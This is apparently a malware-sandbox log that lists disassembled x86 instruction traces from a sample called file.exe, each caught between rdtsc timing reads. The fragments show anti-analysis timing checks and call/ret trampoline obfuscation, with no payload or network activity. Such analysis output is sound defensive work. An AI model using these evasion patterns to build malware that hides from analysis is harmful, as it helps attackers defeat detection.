                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C71485 second address: C71532 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA22C835FA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FA22C835FA8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 call 00007FA22C835FADh 0x0000002c jmp 00007FA22C835FAFh 0x00000031 pop edi 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007FA22C835FA8h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e sub ebx, dword ptr [ebp+122D27C6h] 0x00000054 push 00000000h 0x00000056 push 00000000h 0x00000058 push esi 0x00000059 call 00007FA22C835FA8h 0x0000005e pop esi 0x0000005f mov dword ptr [esp+04h], esi 0x00000063 add dword ptr [esp+04h], 00000017h 0x0000006b inc esi 0x0000006c push esi 0x0000006d ret 0x0000006e pop esi 0x0000006f ret 0x00000070 xchg eax, esi 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007FA22C835FADh 0x00000078 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7075C second address: C70773 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C71532 second address: C7154F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA22C835FB0h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6E5EA second address: C6E5EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70773 second address: C70793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7154F second address: C7155F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA22C516E36h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C15D7C second address: C15D86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA22C835FA6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C15D86 second address: C15D9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E3Eh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C15D9D second address: C15DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007FA22C835FC9h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C15DB0 second address: C15DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C15DB4 second address: C15DB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7514C second address: C751D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FA22C516E38h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push 00000000h 0x00000027 mov edi, ecx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007FA22C516E38h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 jp 00007FA22C516E3Bh 0x0000004b mov bx, dx 0x0000004e xchg eax, esi 0x0000004f push edx 0x00000050 jmp 00007FA22C516E42h 0x00000055 pop edx 0x00000056 push eax 0x00000057 jbe 00007FA22C516E44h 0x0000005d push eax 0x0000005e push edx 0x0000005f push ecx 0x00000060 pop ecx 0x00000061 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C716DC second address: C716E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C716E0 second address: C716E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7541E second address: C75438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C835FB6h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C772DF second address: C772F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FA22C516E38h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C782D0 second address: C782D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C782D4 second address: C782DA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C77478 second address: C7747C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C782DA second address: C782E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C516E3Bh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7752E second address: C7754B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C782E9 second address: C7834C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA22C516E40h 0x0000000e nop 0x0000000f mov dword ptr [ebp+124726C0h], eax 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D3608h] 0x0000001d and ebx, dword ptr [ebp+122D281Eh] 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007FA22C516E38h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 00000018h 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f mov dword ptr [ebp+122D19B3h], ecx 0x00000045 or dword ptr [ebp+1244E0A0h], edx 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push esi 0x0000004f pushad 0x00000050 popad 0x00000051 pop esi 0x00000052 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7754B second address: C77551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C791DA second address: C79256 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a mov esi, dword ptr [ebp+122D298Ah] 0x00000010 popad 0x00000011 and di, 4A17h 0x00000016 push 00000000h 0x00000018 mov edi, 780BD665h 0x0000001d jns 00007FA22C516E3Ch 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push edx 0x00000028 call 00007FA22C516E38h 0x0000002d pop edx 0x0000002e mov dword ptr [esp+04h], edx 0x00000032 add dword ptr [esp+04h], 00000018h 0x0000003a inc edx 0x0000003b push edx 0x0000003c ret 0x0000003d pop edx 0x0000003e ret 0x0000003f js 00007FA22C516E38h 0x00000045 mov edi, ecx 0x00000047 xchg eax, esi 0x00000048 pushad 0x00000049 pushad 0x0000004a js 00007FA22C516E36h 0x00000050 jmp 00007FA22C516E3Ah 0x00000055 popad 0x00000056 jno 00007FA22C516E3Ch 0x0000005c popad 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 pushad 0x00000062 popad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79256 second address: C7925B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7938C second address: C79390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79390 second address: C79394 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79394 second address: C7939A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7946D second address: C79481 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jc 00007FA22C835FA6h 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7A4B7 second address: C7A4D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B536 second address: C7B54D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA22C835FADh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83DB9 second address: C83DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83DBD second address: C83DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FA22C835FA8h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FA22C835FA8h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jmp 00007FA22C835FAFh 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8B381 second address: C8B3A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 popad 0x0000000a push eax 0x0000000b jnc 00007FA22C516E4Eh 0x00000011 pushad 0x00000012 jmp 00007FA22C516E40h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8B3A5 second address: C8B3C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c jmp 00007FA22C835FB5h 0x00000011 pop esi 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8B3C7 second address: C8B3F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007FA22C516E3Dh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jnl 00007FA22C516E36h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8B3F6 second address: C8B3FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C91E2E second address: C91E40 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA22C516E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FA22C516E36h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1E431 second address: C1E440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C835FABh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1E440 second address: C1E45A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E44h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C91099 second address: C9109D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9109D second address: C910A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C910A3 second address: C910B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FA22C835FA6h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C910B3 second address: C910B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C910B7 second address: C910BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C91397 second address: C9139D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C91674 second address: C91696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FA22C835FA6h 0x00000009 jmp 00007FA22C835FB7h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9181C second address: C91839 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA22C516E36h 0x00000008 jmp 00007FA22C516E43h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C91977 second address: C91981 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA22C835FA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C91981 second address: C919AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FA22C516E42h 0x0000000f jns 00007FA22C516E36h 0x00000015 jns 00007FA22C516E36h 0x0000001b jmp 00007FA22C516E40h 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C919AC second address: C919B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FA22C835FA6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C919B6 second address: C919BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C91C99 second address: C91C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C91C9D second address: C91CA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C982AA second address: C982BE instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA22C835FA6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C982BE second address: C982EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C516E49h 0x00000009 popad 0x0000000a jc 00007FA22C516E42h 0x00000010 jno 00007FA22C516E36h 0x00000016 je 00007FA22C516E36h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9EBEB second address: C9EC0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FA22C835FACh 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f jmp 00007FA22C835FAAh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9D92D second address: C9D93C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA22C516E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9D93C second address: C9D941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DBE2 second address: C9DC53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FA22C516E48h 0x0000000e pop edi 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FA22C516E48h 0x00000018 je 00007FA22C516E36h 0x0000001e popad 0x0000001f pushad 0x00000020 jnl 00007FA22C516E36h 0x00000026 jmp 00007FA22C516E42h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DDA9 second address: C9DDD0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA22C835FB9h 0x0000000d jne 00007FA22C835FA6h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DDD0 second address: C9DDD6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DDD6 second address: C9DDF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA22C835FB5h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DDF5 second address: C9DDF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9E1E9 second address: C9E205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C835FABh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f jp 00007FA22C835FA6h 0x00000015 pop ebx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9E381 second address: C9E3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C516E3Eh 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FA22C516E43h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA22C516E45h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9E3C0 second address: C9E3C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9E54B second address: C9E54F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4026C second address: C4027F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007FA22C835FAEh 0x0000000b jno 00007FA22C835FA6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4027F second address: C40299 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E44h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C40299 second address: C402A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA22C835FA6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5CEC3 second address: C5CEC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5CEC7 second address: C5CECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5CECD second address: C5CED3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5CED3 second address: C5CEE9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA22C835FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007FA22C835FA6h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5CEE9 second address: C5CEED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D437 second address: C5D43B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D43B second address: C5D441 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D441 second address: C5D446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D4DE second address: C5D4E8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA22C516E3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D4E8 second address: C5D506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], esi 0x00000009 jns 00007FA22C835FA6h 0x0000000f and cl, 0000007Bh 0x00000012 push eax 0x00000013 pushad 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D506 second address: C5D50A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA38FE second address: CA3942 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA22C835FACh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FA22C835FB6h 0x00000011 jmp 00007FA22C835FB0h 0x00000016 popad 0x00000017 push ecx 0x00000018 push ebx 0x00000019 push eax 0x0000001a pop eax 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FA22C835FB4h 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA3ABF second address: CA3ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA22C516E36h 0x0000000a pop edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA3ACA second address: CA3AD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA3AD0 second address: CA3AD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
